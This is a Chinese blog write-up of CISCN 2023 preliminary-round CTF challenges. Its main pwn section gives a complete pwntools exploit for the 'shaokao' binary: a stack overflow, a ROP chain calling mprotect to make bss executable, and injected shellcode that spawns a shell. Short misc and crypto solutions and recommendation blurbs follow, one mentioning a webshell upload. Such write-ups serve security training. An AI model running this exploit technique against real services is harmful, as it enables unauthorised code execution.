ciscn_pwn_shaokao

最新推荐文章于 2024-05-23 11:39:44 发布
最新推荐文章于 2024-05-23 11:39:44 发布
阅读量145 收藏 1
点赞数
文章标签: 经验分享 系统安全 网络安全 密码学
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Hyrink/article/details/130956823
版权

ciscn初赛wp

pwn

shaokao

检查:

image-20230527170343950

发现是64位静态链接文件

ida查看:

main

image-20230527170503429

menu

image-20230527170530084

可以看到这里有一个if判断才可执行的“改名”

image-20230527170634568

很明显这里有一个栈溢出:

io.recvuntil("0. 离开".encode('utf-8'))
io.sendline(b'1')
io.recvuntil("3. 勇闯天涯\n".encode('utf-8'))
io.sendline(b'1')
io.recvuntil("来几瓶?\n".encode('utf-8'))
io.sendline(b'-99999')
io.recvuntil("0. 离开\n".encode('utf-8'))
io.sendline(b'4')
io.recvuntil("0. 离开\n".encode('utf-8'))
io.sendline(b'5')

拿到改名选项。

但是这题没有给我们system和binsh所以只能换种思路:因为是静态链接,所以一定有mprotect函数,可以直接更改段权限,这里我们可以直接更改bss段的权限,然后直接把shallcode写入bss段执行,又因为是64位,所以需要寄存器传参:

mprotect:

#include <sys/mman.h>
int mprotect(void *addr, size_t len, int prot);
addr:修改保护属性区域的起始地址,addr必须是一个内存页的起始地址,简而言之为页大小(一般是 4KB == 4096字节)整数倍。
len:被修改保护属性区域的长度,最好为页大小整数倍。修改区域范围[addr, addr+len-1]。
prot:可以取以下几个值,并可以用“|”将几个属性结合起来使用:
1)PROT_READ:内存段可读;
2)PROT_WRITE:内存段可写;
3)PROT_EXEC:内存段可执行;
4)PROT_NONE:内存段不可访问。
返回值:0;成功,-1;失败(并且errno被设置)
1)EACCES:无法设置内存段的保护属性。当通过 mmap(2) 映射一个文件为只读权限时,接着使用 mprotect() 标志为 PROT_WRITE这种情况就会发生。
2)EINVAL:addr不是有效指针,或者不是系统页大小的倍数。
3)ENOMEM:内核内部的结构体无法分配。
这里的参数prot:
r:4
w:2
x:1
prot为7(1+2+4)就是rwx可读可写可执行,与linux文件属性用法类似

参考:Linux中mprotect()函数详解__bob_h的博客-CSDN博客

所以这里就可以更改权限:

payload = b'a'*(0x20+8)+p64(pop_rdi)+p64(bss_addr)+p64(pop_rsi)+\ p64(0x100)+p64(pop_rdx)+p64(0x7)+p64(0x0)+p64(mp_addr)+p64(pop_rdi)+p64(0)+p64(pop_rsi)+p64(buf_addr)+p64(pop_rdx)+p64(0x100)+p64(0x0)+p64(read)+p64(buf_addr)#这里实际找到的pop_rdx只有两个

image-20230527172614882

所以还要多传一个参数

通过rdi,rsi,rdx三个寄存器给mprotect传参更改权限,然后ret到read函数的地址写入shellcode,再跳转到shellcode处执行

注:这里bss段的地址只能选用4kb整数倍的地址。

exp

from pwn import*
context(log_level='debug',arch='amd64',os='linux')
context(terminal = ['tmux','split','-h'])
# io =remote('123.56.238.150',24460)
io = process('./shaokao')
mp_addr = 0x0458B00
pop_rdi = 0x040264f
pop_rsi = 0x040a67e
pop_rdx = 0x04a404b
read = 0x0457DD0
buf_addr = 0x4E9000
bss_addr = 0x4E9000

io.recvuntil("0. 离开".encode('utf-8'))
io.sendline(b'1')
io.recvuntil("3. 勇闯天涯\n".encode('utf-8'))
io.sendline(b'1')
io.recvuntil("来几瓶?\n".encode('utf-8'))
io.sendline(b'-99999')
io.recvuntil("0. 离开\n".encode('utf-8'))
io.sendline(b'4')
io.recvuntil("0. 离开\n".encode('utf-8'))
io.sendline(b'5')
# gdb.attach(io)
payload = b'a'*(0x20+8)+p64(pop_rdi)+p64(bss_addr)+p64(pop_rsi)+\
    p64(0x100)+p64(pop_rdx)+p64(0x7)+p64(0x0)+p64(mp_addr)+p64(pop_rdi)+p64(0)+p64(pop_rsi)+p64(buf_addr)+p64(pop_rdx)+p64(0x100)+p64(0x0)+\
    p64(read)+p64(buf_addr)
io.recvuntil("请赐名:\n".encode('utf-8'))
shellcode = asm(shellcraft.sh())
io.sendline(payload)
io.sendline(shellcode)

io.interactive()

misc

使用wireshark打开:

直接追踪tcp流:

image-20230528174521395

中间红色部分拼接:

MMYWMX3GNEYWOXZRGAYDA===

直接base32解码:

flag:

c1f_fi1g_1000

Crypto

sign in passwd

用给的第二行数据进行base64换表,再解码:

from base64 import*
T1 = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'
T2 = 'GHI3KLMNJOPQRSTUb%3DcdefghijklmnopWXYZ%2F12%2B406789VaqrstuvwxyzABCDEF'
T2 = 'GHI3KLMNJOPQRSTUb=cdefghijklmnopWXYZ/12+406789VaqrstuvwxyzABCDEF'
enc = 'j2rXjx8yjd=YRZWyTIuwRdbyQdbqR3R9iZmsScutj2iqj3/tidj1jd=D'
str = ''
for i in range(len(enc)):
   str += T1[T2.index(enc[i])]
# str = base64.b64decode(str)
print(str)

得出:

ZmxhZ3s4ZTRiMjg4OC02MTQ4LTQwMDMtYjcyNS0zZmYwZDkzYTZlZTR9

解码:

flag{8e4b2888-6148-4003-b725-3ff0d93a6ee4}

国密sm2

做题时的记录:

"id": "45c620d1-0c23-4e75-aa49-484f769dc6e8"

A_prvite=2ABD46BACD79A7DE3E494056F80C3A802776CF454FB60EB4021D3162FA4BC3BC

A_public=E7EA0C52F83B28EC7449FDE2346650BA108BEF938E6622A279726B27FCB48D8650A324962C3B7E1857968FB2C734323FC65B675755BFC583EE343431D3E6B906

B_private=597a62be8f1f746b104b060351e7841e3a84d1a07b78f76908c420d8d467ce47

B_pub=0438e483c718bae10e03d4ed4476bd28131383860034b47364a48d27436e23acd2328de25edd07519be64874d88734f4cc2eb9fff2756065f5745f229d206cbdf3

random=9a770cae67c0277737b704dfcf02663dd278f8eb1fb46ddedbf1762ec0c75057a66614843af1624b68502c3487de72fb0fc661e1e713c333021afd36fe78d2d276fb8be13315b68870b9a825b86654e699cb2c92ee07d6f460e93e8dd6c75081009dbe7d1d1b2a9af28aae6fad3e6aa5

 "quantumString": "fd11b5ac03f85cd368d9234f847f2936a08ca3531468d4c67d3e3a002966725ccb0b793d12e4b0ad55689b72ac916998b4cba165c68ba09252b9f6724a28f7767921e9ddd63768530fd99e6738925cee8762d61ac2f9e29397dbbefd53110d26605bda47ab788e5548bc8ea3a77395fc"

随机数铭文:29 24 55 C9 3D 98 EA 1A 4B 25 8E A8 8D 97 77 30 

B_pri明文=


E8 B4 BA 6E F1 3A CE 6C  DC D2 79 FF DA D6 54 49
25 74 18 94 2B 0C EF 92  F1 9A 81 AF 02 66 62 6E

E34E5F83817D03A55E257D0214CD04E774E372FC451F1157773C2EA8012AFF1A1955E9BFC076D76F386526ED31CB411A0CFDE51D1F05CF7C07525D0CF69D67349F425C0AA71201E71C4DFA8A40B7A08191A5706B817563DB93CE

EC 5F 32 7D DB 33 CB 94 1D B3 C0 8B F8 E3 A7 BA

根据给的文件做就可以.

C2EA8012AFF1A1955E9BFC076D76F386526ED31CB411A0CFDE51D1F05CF7C07525D0CF69D67349F425C0AA71201E71C4DFA8A40B7A08191A5706B817563DB93CE

EC 5F 32 7D DB 33 CB 94 1D B3 C0 8B F8 E3 A7 BA


根据给的文件做就可以.
Hyrink
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
ciscn2023_烧烤摊儿 wp(python3)
Kata_Jhin的博客
05-29 510
ciscn2023_烧烤摊儿(python3)wp
CISCN2023初赛pwn
qq_51627915的博客
05-29 280
2023ciscn的初赛
2023CISCN初赛
这个人很懒,什么都懒得写
06-04 886
随便写写
2023CISCN部分wp
qq_51862722的博客
05-29 705
2023ciscn部分wp
ciscn2023初赛 writeup
S4n_v1的博客
05-28 2703
第十六届全国大学生信息安全竞赛创新实践能力赛初赛wp。 pwn 2/6, misc 5/7, crypto 4/7, re 2/6, web 3/6
CISCN WP ——R3vCr4ck
于高山之巅,方见大河奔涌;于群峰之上,更觉长风浩荡。
05-28 970
"flag": "已完成考题,结果正确:flag{deaf73a5-7d79-44c0-b83e-d4f9a114ca86}"分析题目,发现修改程序后的测试程序位于容器内,使用winscp通过scp连接容器,观察分析文件,尝试直接寻找flag文件。Php编写程序,把木马压到zip里面上传,直接上传一句话木马无效,尝试在压缩包里藏一个软链接把文件勾出来,多次尝试后得到。的思路溢出覆盖程序后下两位地址,保证高位地址不发生变化,避免去爆破高位地址。打开之后发现是文件上传,任意传一个文件,
[CTF]-PWN:部分题目WP
2301_79326813的博客
03-02 92
【代码】[CTF]-PWN:部分题目exp。
某不知名ctfer选手的第一周周报
2303_79366759的博客
04-22 869
不知道你们是不是有时候会遇到这种情况,你们可能是想对%6$p对应的地方写值,但是这个它是对指针进行操作的,那么%6$p对应的地方,也就是rsp对应的地方它的值是0x1,可能我们的意是想把通过%255c%6$n把0x1改成我们需要的值,但是格式化字符串会把0x1解析为一个地址,那么我们对0x1这个地址写值,当然会不可避免的出错,所以我们要想办法把一个指针指向rsp的位置,那么就可以对rsp保存的指针保存里面的值进行修改了。直接让我们的编译器模拟环境,然后就可以通过c语言代码模拟生成的v5的值,就可以了。
ciscn_2019_n_3
12-30
ciscn(全国大学生信息安全竞赛),2019年的一道题目,涉及到fastbin堆漏洞的利用。由于调用了system函数,所以漏洞利用的难度不大,推荐初学者练习。题解链接:...
ciscn_2021_silverwolf.zip
05-18
2021第十四届全国大学生信息安全竞赛pwn题。
ciscn_2021_game
06-23
2021年国赛的pwn题,虚拟机类型的题目,分析起来比较有难度。
ciscn_2021_pwny.zip
05-17
2021年全国大学生信息安全竞赛pwn题。
ciscn_2021_lonelywolf.zip
05-17
2021年全国大学生信息安全竞赛pwn题。
(二十)【Jmeter】经验分享-依据业务配比多功能随机压测脚本组织结构
WEL测试
05-22 182
工作实践,依据业务配比多功能随机压测脚本组织结构模板样例拆解及命令行压测及报告
24 内核开发- Linux 内核各种设计模式
jxusthusiwen的专栏
05-15 1121
内核使用桥接模式将文件系统抽象与具体的文件系统实现分离开来,如 ext4 和 XFS。实现: 内核使用策略模式来选择不同的内存管理算法,如 Buddy 系统和 SLOB。实现: 文件系统使用观察者模式来通知 inotify 模块文件系统更改。实现: 内核使用责任链模式将系统调用请求传递给一系列内核函数。实现: 内核使用状态模式来管理进程的状态,如运行、等待和停止。实现: 内核使用模板方法模式来实现文件系统操作,如读写文件。实现: 内核使用代理模式来限制对系统调用和文件操作的访问。
比较kube-proxy模式:iptables还是IPVS?
最新发布
didiplus
05-23 784
kube-proxy是任何Kubernetes部署中的关键组件。它的作用是将流向服务(通过集群 IP 和节点端口)的流量负载均衡到正确的后端pod。kube-proxyuserspaceiptables或IPVS。userspace模式非常旧且慢,绝对不推荐!但是,应该如何权衡选择iptables还是IPVS模式呢?在本文中,我们将比较这两种模式,在实际的微服务环境中衡量它们的性能,并解释在何种情况下你可能会选择其中一种。首先,我们将简要介绍这两种模式的背景,然后深入测试和结果……
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8237
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
ecc dsa rsa des
youyouxiong的博客
05-21 353
每种技术都有其特定的应用场景和优势。ECC和RSA主要用于公钥加密和数字签名,而DSA则主要用于数字签名。DES作为较老的加密标准,已经被更安全的算法所取代。在选择加密技术时,需要根据具体的安全需求、性能要求和应用场景进行考虑。ECC(椭圆曲线密码学)、DSA(数字签名算法)、RSA(一种公钥加密技术)和DES(数据加密标准)都是密码学领域中重要的加密和安全技术。
xdctf2015_pwn200
09-03
xdctf2015_pwn200是一道CTF比赛中的题目,是一个二进制漏洞利用题目。从代码中可以看出,它利用了一个栈溢出漏洞来实现攻击。在攻击过程中,首先使用write函数的got地址来泄露出libc中write函数的真实地址,然后通过计算偏移量得到libc的基址,进而计算出system函数和/bin/sh字符串的地址。最后,通过构造ROP链来调用system函数,并将/bin/sh字符串作为参数传入,从而获取shell权限。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* [[BUUCTF]PWN——xdctf2015_pwn200](https://blog.csdn.net/mcmuyanga/article/details/109622553)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *3* [xdctf2015_pwn200](https://blog.csdn.net/weixin_44309300/article/details/130628776)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值